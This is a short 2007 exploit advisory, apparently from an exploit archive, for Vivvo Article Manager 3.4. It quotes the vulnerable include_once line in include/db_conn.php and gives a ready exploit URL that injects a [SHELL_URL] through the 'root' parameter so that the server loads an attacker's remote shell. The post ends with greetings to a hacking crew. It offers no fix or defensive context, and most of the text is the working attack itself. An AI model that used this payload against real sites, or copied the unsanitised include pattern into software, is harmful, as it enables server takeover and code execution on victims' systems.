[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Vivvo Article Manager 3.4 (root) Local File Inclusion Vulnerability
# Published : 2007-02-16
# Author : Snip0r
# Previous Title : webSPELL 4.01.02 (showonly) Remote Blind SQL Injection Exploit
# Next Title : Drupal < 5.1 (post comments) Remote Command Execution Exploit v2


===================================================================================================
Author: Snip0r
Script Name: Vivvo Article Manager v 3.4
Website: www.vivvo.net
===================================================================================================
Codesnippet of vulnerable script ("./include/db_conn.php"):

if (file_exists($ext_base_conf_file)) include_once($ext_base_conf_file);
===================================================================================================
Exploit:

http://victim.com/ [Vivvo Article Manager Path] / include / db_conn.php?root=[SHELL_URL]?
===================================================================================================
Greets fly out to: D-T-O, Blutkehle666,Chris,Doc,Legija0ne,Higgy,Anthra><,Basti and bi0
=================================================================================================== 

# www.Syue.com [2007-02-16]